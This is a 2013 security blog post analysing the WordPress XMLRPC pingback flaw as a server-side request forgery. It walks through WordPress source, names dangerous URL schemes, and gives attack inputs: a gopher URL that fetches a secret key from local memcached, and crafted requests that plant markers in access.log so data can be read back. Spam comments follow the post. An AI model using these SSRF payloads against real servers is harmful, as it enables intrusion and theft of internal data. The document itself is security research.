пятница, 4 января 2013 г.

WordPress XMLRPC pingback additional issues

Vulnerability in WordPress XMLRPC pingback function was recently published:

Basically this vuln can be used to scan opened ports on localhost and intranet:

But in fact, this vulnerability is much wider!

First, look at "SSRF bible. Cheatsheet":
and our ZeroNights 0x02 presentation:

Lets try to exploit this bug as a SSRF!
By default WP try to use cURL (libcurl) to make a requests:

 4988       $linea = wp_remote_fopen( $pagelinkedfrom );

 749 function wp_remote_fopen( $uri ) {
 758         $response = wp_remote_get( $uri, $options );

 74 function wp_remote_get($url, $args = array()) {
 75         $objFetchSite = _wp_http_get_object();
 76         return $objFetchSite->get($url, $args);  ...
 22 function &_wp_http_get_object() {
 23         static $http;
 25         if ( is_null($http) )
 26                 $http = new WP_Http();

 294         function get($url, $args = array()) {
 295                 $defaults = array('method' => 'GET');
 296                 $r = wp_parse_args( $args, $defaults );
 297                 return $this->request($url, $r);
 298         }

 81         function request( $url, $args = array() ) {
 191                 return $this->_dispatch_request($url, $r);
 243         private function _dispatch_request( $url, $args ) {
 244                 static $transports = array();
 246                 $class = $this->_get_first_available_transport( $args, $url
 205         public function _get_first_available_transport( $args, $url = null )
 206                 $request_order = array( 'curl', 'streams', 'fsockopen' );

Now you know that using file:// gopher:// dict:// ldap:// and other schemas do this bug really dangerous.
It is easy to exploit local services and host-based auth by dict/gopher.

Try to read data from response. It is may be response with local file content (file://) or data from intranet/services (http://wiki.internal.local, gopher://localhost:11211/1get%20secretkey%0aquit).

Look at WP code again:

 4988   $linea = wp_remote_fopen( $pagelinkedfrom );
 4989   if ( !$linea )
 4999   preg_match('|<title>([^<]*?)</title>|is', $linea, $matchtitle);
 5000   $title = $matchtitle[1];
 5001   if ( empty( $title ) )
 5002      return new IXR_Error(32, __('We cannot find a title on that page.'));
 5004   $linea = strip_tags( $linea, '<a>' ); // just keep the tag we need
 5006   $p = explode( "\n\n", $linea );
 5008   $preg_target = preg_quote($pagelinkedto, '|');
 5009   foreach ( $p as $para ) {
 5010      if ( strpos($para, $pagelinkedto) !== false ) { // it exists, but is it a link?
 5011         preg_match("|<a[^>]+?".$preg_target."[^>]*>([^>]+?)</a>|", $para, $context);
 5013         // If the URL isn't in a link context, keep looking
 5014         if ( empty($context) )
 5015            continue;


 5019         $excerpt = preg_replace('|\</?wpcontext\>|', '', $para);
 5021         // prevent really long link text
 5022         if ( strlen($context[1]) > 100 )
 5023            $context[1] = substr($context[1], 0, 100) . '...';

Data between "<titile>" and "</title>" strings will be put in author field of comment (255 bytes limited by DB field).
Data between "<a >" and "</a>" strings will be put in content field of comment (100 bytes limited by line 5022).

Now it is clear that you can read 355 bytes of arbitrary data.

Let's try to read data from access.log.
First inject markers into access.log by following requests:
http://localhost/tests/wordpress/#<a http://localhost/tests/wordpress/?p=1>

Send requests with markers by manually crafted HTTP packets like this (browsers create HTTP requests w/o anchors):
GET /tests/wordpress/#<a>marker1 HTTP/1.1
Host: localhost

Now you can add comment with arbitrary data between your markers using simple XMLRPC request (see slides 20-23 from our presentation about ProcFS way to read access.log):

For fun - reading output of stats memcached command:

6 комментариев:

  1. Wordpress pingback requires back link to origin post and we cannot read info from resources where we cannot put this link.
    It's just a notice for another readers, because about this is not wrote in article. We cannot read /etc/passwd or same files (Only if they contains link to post WTF).

    Research is intresting, thank you :)

  2. Thanks for sharing, nice post! Post really provice useful information!

    Hương Lâm chuyên cung cấp bán máy photocopy và dịch vụ cho thuê máy photocopy giá rẻ, uy tín TP.HCM với dòng máy photocopy toshiba và dòng máy photocopy ricoh uy tín, giá rẻ.

  3. Trường hợp này có thể được bác sĩ tư vấn sử dụng hoạt huyết dưỡng não trị mất ngủ nhằm hoạt huyết, tăng cường tuần hoàn não.

  4. You can go for the writer of students assignment help and ask them for cheap essay assignment services to write a plagiarism-free paper on your given topic. They will deliver the paper to you on even the urgent basis.